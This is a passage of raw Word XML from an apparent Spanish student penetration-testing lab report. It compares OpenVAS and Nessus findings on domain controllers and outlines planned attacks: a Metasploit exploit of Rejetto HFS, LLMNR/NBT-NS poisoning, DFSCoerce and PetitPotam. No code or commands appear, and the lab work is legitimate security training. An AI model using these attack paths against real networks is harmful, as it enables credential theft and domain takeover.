            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08F9524E" w14:textId="20716777" w:rsidR="003146DE" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ED16D30" wp14:editId="63569AFC">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1507765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5456" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId108" cstate="screen">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26547225" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01AB0F58" w14:textId="06FE315C" w:rsidR="005A365B" w:rsidRDefault="003223A6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Medio:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A17414C" w14:textId="77777777" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DE3B15F" w14:textId="4EE3D8A2" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FAA296" wp14:editId="4B3BFEE7">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="942537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37714" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId109" cstate="screen">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68C8C334" w14:textId="77777777" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17B58CC7" w14:textId="434EA5B4" w:rsidR="005A365B" w:rsidRDefault="003223A6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrándonos con muchas vulnerabilidades de flash player, actualizaciones de Windows, que el servidor de certificados usa un cifrado antiguo y poco seguro, Net-Framework.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7760D986" w14:textId="5985D919" w:rsidR="00EE391A" w:rsidRDefault="003223A6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>El caso del flash player me parece curioso porque las dos máquinas deberían tener las mismas vulnerabilidades pero en el caso del segundo controlador de dominio no encontramos esa vulnerabilidad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A941AE" w14:textId="4DCAA925" w:rsidR="00EE391A" w:rsidRDefault="00EE391A" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Básicamente todas las vulnerabilidades encontradas tanto este servidor de dominio como en el otro se solucionarían actualizando las versiones tanto de Windows como de los programas instalados, menos la del cifrado de la entidad certificadora que aquí habría que cambiarlo a uno más seguro.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65835A3E" w14:textId="77777777" w:rsidR="005A365B" w:rsidRDefault="005A365B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11590535" w14:textId="77777777" w:rsidR="005A365B" w:rsidRDefault="005A365B" w:rsidP="00624BD5">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A44A441" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="614945C4" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="351F44FA" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="79E86641" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="36F2664B" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="3AE022E5" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="0DE0A77C" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="75773ADB" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="4C215A28" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="4BFDC9A5" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="0A2883E2" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="05B1B514" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="78EA2348" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="611752CF" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="1FA98285" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="502A47D1" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="2C95C7F3" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="589685F6" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="48E2817A" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="454C2789" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="22E46981" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="17ED1012" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="7CBD006C" w14:textId="77777777" w:rsidR="00386103" w:rsidRPr="00386103" w:rsidRDefault="00386103" w:rsidP="00386103"/>
          <w:p w14:paraId="15A48C74" w14:textId="7C16650D" w:rsidR="005A365B" w:rsidRDefault="00624BD5" w:rsidP="00624BD5">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>OpenVas -&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="324E2429" w14:textId="77777777" w:rsidR="00624BD5" w:rsidRDefault="00624BD5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C58C2FF" w14:textId="3CC3FD41" w:rsidR="00624BD5" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrando estas vulnerabilidades:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CCE983F" w14:textId="77777777" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B0D295F" w14:textId="292334DA" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46AF503C" wp14:editId="4EA5DABF">
                  <wp:extent cx="6645910" cy="3326130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="979536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36511" name=""/>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6645910" cy="3326130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7FDEC4" w14:textId="77777777" w:rsidR="00624BD5" w:rsidRDefault="00624BD5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="437D0DCF" w14:textId="77777777" w:rsidR="00624BD5" w:rsidRDefault="00624BD5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F39D0CD" w14:textId="77777777" w:rsidR="00624BD5" w:rsidRDefault="00624BD5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B8ED81C" w14:textId="23DD7549" w:rsidR="00624BD5" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E9425F" wp14:editId="6CA3E99C">
                  <wp:extent cx="6645910" cy="3326130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="6824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656" name=""/>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6645910" cy="3326130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="47F689F4" w14:textId="77777777" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79C39FC4" w14:textId="77777777" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="685706FA" w14:textId="76A62912" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Como en el caso anterior volvemos a encontrar casi las mismas vulnerabilidades la mayoría de Flash Player, Actualizaciones de Windows, volvemos a ver el certificado no seguro.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C4BD2E" w14:textId="77777777" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D6673AD" w14:textId="77777777" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11DB2960" w14:textId="7942E1B2" w:rsidR="00995877" w:rsidRDefault="00995877" w:rsidP="00995877">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
            </w:pPr>
            <w:bookmarkStart w:id="25" w:name="_Toc135575982"/>
            <w:r>
              <w:t>Conclusión -&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="25"/>
          </w:p>
          <w:p w14:paraId="59724F94" w14:textId="77777777" w:rsidR="00624BD5" w:rsidRDefault="00624BD5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C1145ED" w14:textId="0B8F30BF" w:rsidR="00624BD5" w:rsidRDefault="00995877" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La diferencia mayor diferencia entre OpenVas y Nessus es que los dos </w:t>
            </w:r>
            <w:r w:rsidR="008C0241">
              <w:t>detectan</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> las mismas vulnerabilidades lo que pasa es que en OpenVas aparecen diferentes cve por cada vulnerabilidad mientras que en Nessus junta las vulnerabilidades</w:t>
            </w:r>
            <w:r w:rsidR="008C0241">
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> es decir si </w:t>
            </w:r>
            <w:r w:rsidR="008C0241">
              <w:t>tú</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> tienes una vulnerabilidad de Flash Player cuando hagas clic en ella se mostrarán todos los cve pero solo la cuenta como una.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E1C3E58" w14:textId="77777777" w:rsidR="00624BD5" w:rsidRDefault="00624BD5" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3408B7AB" w14:textId="4695452A" w:rsidR="008C0241" w:rsidRDefault="008C0241" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora vamos a hablar de los ataques que voy realizar.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B437E55" w14:textId="77777777" w:rsidR="009751DB" w:rsidRDefault="009751DB" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="790486D4" w14:textId="76B45C05" w:rsidR="009751DB" w:rsidRPr="005F0418" w:rsidRDefault="009751DB" w:rsidP="005F0418">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r w:rsidRPr="005F0418">
              <w:t xml:space="preserve">La única vulnerabilidad presente en los escaneos de vulnerabilidades anteriores que voy explotar </w:t>
            </w:r>
            <w:r w:rsidR="005F0418" w:rsidRPr="005F0418">
              <w:t>es Rejetto HTTP File Server (HFS) 2.3.x</w:t>
            </w:r>
            <w:r w:rsidRPr="005F0418">
              <w:t>, que es un servidor de archivos web.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27FEAE07" w14:textId="77777777" w:rsidR="009751DB" w:rsidRDefault="009751DB" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D207FA3" w14:textId="2A984185" w:rsidR="009751DB" w:rsidRDefault="009751DB" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Esta vulnerabilidad se explotará en la máquina Windows 10, con IP 192.168.1.135</w:t>
            </w:r>
            <w:r w:rsidR="005F0418">
              <w:t>, la vulnerabilidad se usará para conseguir una penetración en el sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2230E898" w14:textId="77777777" w:rsidR="006264F2" w:rsidRDefault="006264F2" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BFF3CD8" w14:textId="572E223F" w:rsidR="006264F2" w:rsidRDefault="006264F2" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Elegí esta vulnerabilidad porque quería que no fuera de red, entonces busque exploit para Windows en metasploit, para que la POC existiera, porque realmente Windows tiene muchas vulnerabilidades pero que sean explotables no tantas, me imagino que muchas serán de pago, bien por metasploit pro que sé que trae más vulnerabilidades o por Core Impact, que se dedican a crear sus propios exploits.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60291DC6" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7819E665" w14:textId="57CB6EF4" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Buscando en </w:t>
            </w:r>
            <w:r w:rsidR="00DD0D60">
              <w:t>Google</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> encontré esto video:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="666198AE" w14:textId="77777777" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50C707CD" w14:textId="1054EC35" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4765F5ED" wp14:editId="2D9861B6">
                  <wp:extent cx="6645910" cy="6469380"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="128012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225" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId112">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="6469380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="59096590" w14:textId="3408E6C8" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="00F11183">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Buscando más información sobre la vulnerabilidad:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4901A880" w14:textId="6326BFF5" w:rsidR="00F11183" w:rsidRDefault="00F565FD" w:rsidP="00A673FE">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609F0141" wp14:editId="4EFFFFFE">
                  <wp:extent cx="6645910" cy="6597650"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="721475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5636" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId113">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="6597650"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="57989BDE" w14:textId="77777777" w:rsidR="00F565FD" w:rsidRDefault="00F565FD" w:rsidP="00F565FD"/>
          <w:p w14:paraId="697B473E" w14:textId="2EDCBE90" w:rsidR="00F565FD" w:rsidRPr="00F565FD" w:rsidRDefault="00F565FD" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entonces </w:t>
            </w:r>
            <w:r w:rsidR="009A5213">
              <w:t>simplemente descargo la versión correcta</w:t>
            </w:r>
            <w:r w:rsidR="003451A6">
              <w:t xml:space="preserve"> de la aplicación</w:t>
            </w:r>
            <w:r w:rsidR="003C5729">
              <w:t xml:space="preserve"> y</w:t>
            </w:r>
            <w:r w:rsidR="009A5213">
              <w:t xml:space="preserve"> explot</w:t>
            </w:r>
            <w:r w:rsidR="003C5729">
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="009A5213">
              <w:t xml:space="preserve"> la vulnerabilidad con metasploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="191F5858" w14:textId="77777777" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17BC56A3" w14:textId="0824DAAD" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora pasaré a hablas de las otras tres POC en su conjunto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="080AAF61" w14:textId="77777777" w:rsidR="003451A6" w:rsidRPr="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6"/>
          <w:p w14:paraId="4FDCE0D2" w14:textId="77777777" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01AF6DF0" w14:textId="3A968CFC" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Lo que quería hacer es un ataque de red, entonces elegí el r</w:t>
            </w:r>
            <w:r w:rsidRPr="003451A6">
              <w:t>obo de credenciales de red, Envenenamiento LLMNR-NBT-NS</w:t>
            </w:r>
            <w:r>
              <w:t>, este ataque ya lo conocía de la clase de Bastionado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F4F5C9" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BC18D47" w14:textId="43BBF540" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Una vez realizo este ataque quería usar una vulnerabilidad que fuera los más reciente posible, entonces buscando en Google encontré el ataque de DFSCOERCE: </w:t>
            </w:r>
            <w:hyperlink r:id="rId114" w:history="1">
              <w:r w:rsidRPr="00537D4B">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                </w:rPr>
                <w:t>https://unaaldia.hispasec.com/2022/06/dfscoerce.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF51EDB" w14:textId="35C7E48E" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7092698F" w14:textId="5EC84F94" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Este ataque me permitirá conseguir todas las cuentas del dominio, con una complejidad interesante, no es simplemente ejecutar un script.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6824A21E" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3455F224" w14:textId="201A1669" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Una vez encontrado este ataque encontré también el de PetitPotam que es una vulnerabilidad que me permitirá conseguir el mismo objetivo que el anterior.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739693FF" w14:textId="42194071" w:rsidR="00F11183" w:rsidRDefault="00F11183" w:rsidP="003451A6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B072A92" w14:textId="77777777" w:rsidR="00DD0D60" w:rsidRDefault="00DD0D60" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="10330157" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="63351554" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="71F6384B" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="6D74A98C" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="3CD060B0" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="66726465" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="500DFBB2" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="50086C43" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="11820AA7" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="377E0E47" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="5811193B" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="68EA6F72" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="3EC09496" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="43354F6F" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="6682BEC1" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="1A54AD6B" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="35947356" w14:textId="77777777" w:rsidR="003451A6" w:rsidRDefault="003451A6" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="434D4B0D" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="00A5504C" w14:textId="77777777" w:rsidR="00386103" w:rsidRPr="00DD0D60" w:rsidRDefault="00386103" w:rsidP="00DD0D60"/>
          <w:p w14:paraId="38D0B40D" w14:textId="6FCB926B" w:rsidR="00472768" w:rsidRDefault="00507D29" w:rsidP="00C07009">
            <w:pPr>
              <w:pStyle w:val="Ttulo1"/>
            </w:pPr>
            <w:bookmarkStart w:id="26" w:name="_Toc135575983"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidR="00C07009">
              <w:t>Pruebas de concepto POC</w:t>
            </w:r>
            <w:bookmarkEnd w:id="26"/>
          </w:p>
          <w:p w14:paraId="1A9DC340" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00C07009"/>
